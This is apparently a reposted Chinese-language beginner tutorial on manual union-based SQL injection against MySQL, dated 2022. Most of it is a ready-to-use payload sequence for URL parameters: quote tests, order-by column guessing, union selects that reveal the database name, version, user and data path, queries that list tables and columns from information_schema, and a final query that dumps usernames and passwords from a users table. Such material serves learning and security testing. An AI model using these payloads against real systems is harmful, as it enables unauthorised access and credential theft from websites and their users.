MySQL手工注入之基本注入流程

2022/02/12 安全知识 共 1178 字,约 4 分钟

mysql 盲注学习

盲注有哪些分类? 总体来讲,盲注分为布尔型延时型两大类。

一文搞定 MySQL 盲注

sql 介绍

收集信息

在爆出的字段值里面可以替换为我们的恶意语句,前期主要是收集信息,包括判断当前数据库是否是root用户,MySQL的版本等,一般收集这些信息常用一些MySQL自带的函数去收集信息:MySQL常用的系统函数

version()            #MySQL版本user()               
#数据库用户名database()           #数据库名@@datadir            #数据库路径
@@version_compile_os #操作系统版本


?id=1'		(测试是否存在注入,报错说明闭合成功,则存在)
?id=1		(测试是否存在注入,报错说明闭合成功,则存在)
?id=1'-- -		(注释后面多余的’limit 0,1 页面正常)
?id=1'order by n-- -		(order by 猜列数)
?id=-1’union select 1,2,3-- -
?id=-1’union select 1,2,database()-- -		(在页面回显出当前的数据库名字)
?id=-1’union select 1,2,group_concat(table_name) from information_schema.tables where t			able_schema=database() -- -		(爆出当前数据库的所有表)
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' -- -		(爆出目标表的列名)
?id=0 union select 1,2,group_concat(username,0x3a,password) from users-- -		(爆字段)

查询当前数据库名

id=1' and 1=2 UNION SELECT 1,database(),3 --+

查询MySQL版本


id=1' and 1=2 UNION SELECT 1,2,version() --+

查询数据库用户和路径

id=1' and 1=2 UNION SELECT 1,user(),@@datadir --+

查询表名

database 查询数据库

id=1' and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

单引号-数据库

id=1' and 1=2 UNION SELECT 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

转载

新手科普 | MySQL手工注入之基本注入流程

文档信息

Search

    Table of Contents